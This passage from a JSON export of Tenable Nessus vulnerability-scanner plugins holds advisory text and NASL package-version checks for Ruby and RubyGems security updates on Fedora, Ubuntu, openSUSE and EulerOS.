Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-08-11T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygems-2.4.8-100.fc22 (2015-12574)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygems", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-12574.NASL", "href": "https://www.tenable.com/plugins/nessus/85312", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12574.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85312);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3900\");\n script_xref(name:\"FEDORA\", value:\"2015-12574\");\n\n script_name(english:\"Fedora 22 : rubygems-2.4.8-100.fc22 (2015-12574)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1236116\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163600.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e9aedd58\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygems package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygems-2.4.8-100.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygems\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:36", "description": "It was discovered that Ruby DL::dlopen incorrectly handled opening libraries. An attacker could possibly use this issue to open libraries with tainted names. This issue only applied to Ubuntu 14.04 LTS.\n(CVE-2009-5147)\n\nTony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the Ruby OpenSSL extension incorrectly handled hostname wildcard matching.\nThis issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)\n\nChristian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly handled certain crafted strings. An attacker could use this issue to cause a denial of service, or possibly execute arbitrary code. This issue only applied to Ubuntu 14.04 LTS. (CVE-2015-7551)\n\nIt was discovered that Ruby Net::SMTP incorrectly handled CRLF sequences. A remote attacker could possibly use this issue to inject SMTP commands. (CVE-2015-9096)\n\nMarcin Noga discovered that Ruby incorrectly handled certain arguments in a TclTkIp class method. An attacker could possibly use this issue to execute arbitrary code. 
This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2337)\n\nIt was discovered that Ruby Fiddle::Function.new incorrectly handled certain arguments. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2339)\n\nIt was discovered that Ruby incorrectly handled the initialization vector (IV) in GCM mode. An attacker could possibly use this issue to bypass encryption. (CVE-2016-7798).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities (USN-3365-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5147", "CVE-2015-1855", "CVE-2015-7551", "CVE-2015-9096", "CVE-2016-2337", "CVE-2016-2339", "CVE-2016-7798"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:libruby2.0", "p-cpe:/a:canonical:ubuntu_linux:libruby2.3", "p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:ruby2.0", "p-cpe:/a:canonical:ubuntu_linux:ruby2.3", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3365-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101974", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3365-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101974);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2009-5147\", \"CVE-2015-1855\", \"CVE-2015-7551\", \"CVE-2015-9096\", \"CVE-2016-2337\", \"CVE-2016-2339\", \"CVE-2016-7798\");\n script_xref(name:\"USN\", value:\"3365-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities (USN-3365-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Ruby DL::dlopen incorrectly handled opening\nlibraries. An attacker could possibly use this issue to open libraries\nwith tainted names. This issue only applied to Ubuntu 14.04 LTS.\n(CVE-2009-5147)\n\nTony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the\nRuby OpenSSL extension incorrectly handled hostname wildcard matching.\nThis issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)\n\nChristian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly\nhandled certain crafted strings. An attacker could use this issue to\ncause a denial of service, or possibly execute arbitrary code. This\nissue only applied to Ubuntu 14.04 LTS. (CVE-2015-7551)\n\nIt was discovered that Ruby Net::SMTP incorrectly handled CRLF\nsequences. A remote attacker could possibly use this issue to inject\nSMTP commands. (CVE-2015-9096)\n\nMarcin Noga discovered that Ruby incorrectly handled certain arguments\nin a TclTkIp class method. An attacker could possibly use this issue\nto execute arbitrary code. 
This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2337)\n\nIt was discovered that Ruby Fiddle::Function.new incorrectly handled\ncertain arguments. An attacker could possibly use this issue to\nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2339)\n\nIt was discovered that Ruby incorrectly handled the initialization\nvector (IV) in GCM mode. An attacker could possibly use this issue to\nbypass encryption. (CVE-2016-7798).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3365-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby2.0\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:ruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libruby2.0\", pkgver:\"2.0.0.484-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby2.0\", pkgver:\"2.0.0.484-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libruby2.3\", pkgver:\"2.3.1-2~16.04.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"ruby2.3\", pkgver:\"2.3.1-2~16.04.2\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libruby2.3\", pkgver:\"2.3.3-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"ruby2.3\", pkgver:\"2.3.3-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby1.9.1 / libruby2.0 / libruby2.3 / ruby1.9.1 / ruby2.0 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:24", "description": "This update for ruby2.2, ruby2.3 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the Fiddle::Function.new'initialize' (boo#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (boo#959495)\n\nDetailed ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog", "cvss3": {}, 
"published": "2017-04-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ruby2.2 / ruby2.3 (openSUSE-2017-435)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7551", "CVE-2016-2339"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libruby2_2-2_2", "p-cpe:/a:novell:opensuse:libruby2_2-2_2-debuginfo", "p-cpe:/a:novell:opensuse:libruby2_3-2_3", "p-cpe:/a:novell:opensuse:libruby2_3-2_3-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.2", "p-cpe:/a:novell:opensuse:ruby2.2-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.2-debugsource", "p-cpe:/a:novell:opensuse:ruby2.2-devel", "p-cpe:/a:novell:opensuse:ruby2.2-devel-extra", "p-cpe:/a:novell:opensuse:ruby2.2-doc-ri", "p-cpe:/a:novell:opensuse:ruby2.2-stdlib", "p-cpe:/a:novell:opensuse:ruby2.2-stdlib-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.2-tk", "p-cpe:/a:novell:opensuse:ruby2.2-tk-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.3", "p-cpe:/a:novell:opensuse:ruby2.3-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.3-debugsource", "p-cpe:/a:novell:opensuse:ruby2.3-devel", "p-cpe:/a:novell:opensuse:ruby2.3-devel-extra", "p-cpe:/a:novell:opensuse:ruby2.3-doc-ri", "p-cpe:/a:novell:opensuse:ruby2.3-stdlib", "p-cpe:/a:novell:opensuse:ruby2.3-stdlib-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.3-tk", "p-cpe:/a:novell:opensuse:ruby2.3-tk-debuginfo", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-435.NASL", "href": "https://www.tenable.com/plugins/nessus/99208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-435.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99208);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n 
script_cve_id(\"CVE-2015-7551\", \"CVE-2016-2339\");\n\n script_name(english:\"openSUSE Security Update : ruby2.2 / ruby2.3 (openSUSE-2017-435)\");\n script_summary(english:\"Check for the openSUSE-2017-435 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ruby2.2, ruby2.3 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (boo#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and\n DL (boo#959495)\n\nDetailed ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1018808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959495\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ruby2.2 / ruby2.3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_2-2_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_2-2_2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_3-2_3\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_3-2_3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-tk\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:ruby2.3-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_2-2_2-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_2-2_2-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-debugsource-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
reference:\"ruby2.2-devel-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-devel-extra-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-doc-ri-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-stdlib-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-stdlib-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-tk-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-tk-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_2-2_2-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_2-2_2-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_3-2_3-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_3-2_3-debuginfo-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-debugsource-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-devel-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-devel-extra-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-doc-ri-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-stdlib-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-stdlib-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-tk-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-tk-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-2.3.3-2.3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-debuginfo-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-debugsource-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-devel-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-devel-extra-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-doc-ri-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-stdlib-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-stdlib-debuginfo-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-tk-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-tk-debuginfo-2.3.3-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby2_2-2_2 / libruby2_2-2_2-debuginfo / ruby2.2 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-19T12:22:52", "description": "According to the versions of the ruby packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.Security Fix(es):An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. 
When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.(CVE-2018-16395)An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.(CVE-2018-16396)** RESERVED\n ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8322)** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem.\n When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8323)** RESERVED ** This candidate has been reserved by an organization or individual that will 